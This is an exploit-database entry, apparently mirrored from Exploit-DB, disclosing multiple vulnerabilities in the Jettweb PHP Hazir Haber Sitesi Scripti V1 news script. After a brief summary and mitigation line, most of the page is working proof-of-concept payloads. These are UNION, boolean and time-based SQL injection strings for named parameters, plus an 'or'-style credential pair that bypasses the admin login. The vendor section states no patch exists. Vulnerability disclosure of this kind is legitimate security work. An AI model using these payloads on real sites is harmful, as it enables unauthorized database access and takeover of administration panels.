header-logo
Suggest Exploit
vendor:
PHP Hazir Haber Sitesi Scripti V1
by:
Ahmet Ümit BAYRAM
5.5
CVSS
MEDIUM
SQL Injection, Authentication Bypass
89
CWE
Product Name: PHP Hazir Haber Sitesi Scripti V1
Affected Version From: V1
Affected Version To: V1
Patch Exists: NO
Related CWE:
CPE: a:jettweb:php_hazir_haber_sitesi_scripti_v1
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Jettweb PHP Hazir Haber Sitesi Scripti V1 – Multiple Vulnerabilities

The Jettweb PHP Hazir Haber Sitesi Scripti V1 is vulnerable to multiple SQL Injection vulnerabilities, allowing attackers to execute arbitrary SQL commands. Additionally, the script is also vulnerable to an authentication bypass vulnerability, which allows unauthorized access to the administration panel.

Mitigation:

The vendor should release a patch to sanitize user inputs and implement proper authentication mechanisms to mitigate the vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V1 - Multiple Vulnerabilities
# Date: 23.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-5-php-hazir-haber-sitesi-scripti-v1.html
# Demo Site: http://haberv1.proemlaksitesi.net
# Version: V1
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/gallery.php?gallery_id=1
Vulnerable Parameter: gallery_id (GET)
Payload: gallery_id=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)--
UsCA


----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/haberarsiv.php?cid=1
Vulnerable Parameter: cid (POST)
Payload: cid=1' UNION ALL SELECT
CONCAT(0x7162707a71,0x506a594d7a4f6c64674249466d746d6c5751486e786745667369685263624c6445654f665a4f4146,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
ihPG

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/arama.php?T1=btnVote=G%C3%B6nder&ara=1
Vulnerable Parameter: poll (POST)
Payload:
1&option=2&poll=-1'%20OR%203*2*1=6%20AND%20000889=000889%20--%20&stage=

----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/uyelik.php
Vulnerable Parameter: option (POST)
Payload:
btnVote=G%C3%B6nder&option=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&poll=1&stage=2


----- PoC 5: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'